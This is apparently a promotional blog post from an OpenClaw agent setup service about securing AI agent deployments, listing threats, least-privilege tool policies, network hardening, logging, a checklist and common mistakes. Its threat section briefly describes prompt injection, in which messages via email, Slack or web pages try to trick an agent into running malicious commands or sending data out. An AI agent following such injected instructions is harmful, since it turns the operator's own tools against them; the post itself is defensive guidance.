Your OpenClaw agent can run shell commands, control browsers, manage files, send messages, and interact with APIs. That's what makes it useful. It's also what makes security non-negotiable.
I've audited enough DIY setups to know that most people either lock things down so tight the agent can't do anything, or leave everything wide open because "it's just running on my home network." Both are wrong.
The real threats
Before hardening anything, understand what you're protecting against:
Prompt injection. Someone sends your agent a message (via email, Slack, or a web page it's reading) that tries to trick it into executing malicious commands. This is the most realistic threat for most deployments — and it's more common than people think.
Unauthorized access. Someone gains access to your agent's communication channel or the machine it runs on. Now they can issue commands as if they were you.
Data exfiltration. The agent accidentally sends sensitive data somewhere it shouldn't — through a bug in a skill or because a prompt injection directed it to.
Lateral movement. If the agent's host machine is compromised, how much of your network can the attacker reach?
Most home and small business deployments don't need to worry about nation-state attacks. But prompt injection is an everyday risk that anyone running an agent should take seriously.
What proper security looks like
A well-secured OpenClaw deployment has several layers working together:
Principle of least privilege. Your agent should have access to exactly what it needs and nothing more. Restricted file system access, scoped shell permissions, limited network access, and channel-level permission controls.
Tool policies. OpenClaw's tool policy system is your primary security control. Deny by default, then explicitly allow what's needed. Require human confirmation for destructive actions. Use read-only access where possible.
Network hardening. The gateway shouldn't be exposed to the public internet without authentication. SSH restricted to known IPs. HTTPS everywhere. Firewall rules limiting both inbound and outbound traffic.
Audit logging. Every tool invocation, every message, every authentication event — logged and stored separately from the agent's host machine. With log rotation so your disk doesn't fill up over months.
Secrets management. API keys in environment variables, not config files. Separate service accounts for the agent. Regular key rotation. Scoped permissions on every token.
Prompt injection defense. External content treated as data, not instructions. Autonomous actions limited and gated. Input validation in custom skills. Monitoring for unusual behavior patterns.
The security checklist
A properly secured deployment covers:
- Agent running as a dedicated, non-root user
- Tool policies configured with deny-by-default
- Destructive actions requiring human confirmation
- Gateway not exposed to public internet
- HTTPS on all communication
- Audit logging enabled with separate storage
- API keys properly managed and rotated
- Firewall configured on the host
- Kill switch documented and tested
- Regular update schedule
Missing any one of these creates a gap. Getting all of them right — and keeping them right as your setup evolves — requires understanding how each piece interacts with the others.
Common mistakes we see
Running the agent as root. More common than you'd think. Creates massive blast radius if anything goes wrong.
Same credentials everywhere. If your agent's Slack token has admin access to your workspace, a prompt injection could do real damage.
No kill switch. If your agent goes haywire, how do you stop it quickly? Every deployment needs a documented emergency shutdown procedure.
Security theater. A complex firewall config means nothing if your API keys are in a public GitHub repo. Focus on the basics first.
Set and forget. Security isn't a one-time setup. Dependencies get patches, new vulnerabilities emerge, configurations drift. Regular review is part of the deal.
Why security is where professional setup matters most
A misconfigured agent with shell access to your server isn't an asset — it's a liability. Security is the area where the cost of getting it wrong is highest, and where experience makes the biggest difference.
We've hardened dozens of OpenClaw deployments across different environments — Mac Minis, VPS, home servers, enterprise networks. We know the common attack vectors, the configuration mistakes, and the monitoring gaps.
If you're running OpenClaw and want a security review, or starting fresh and want it locked down from day one, book a call or check out our setup packages. We'll make sure your agent is useful without being dangerous.
Keep reading: